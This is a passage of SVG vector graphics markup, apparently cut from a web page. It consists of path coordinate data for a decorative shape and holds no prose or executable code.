1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path 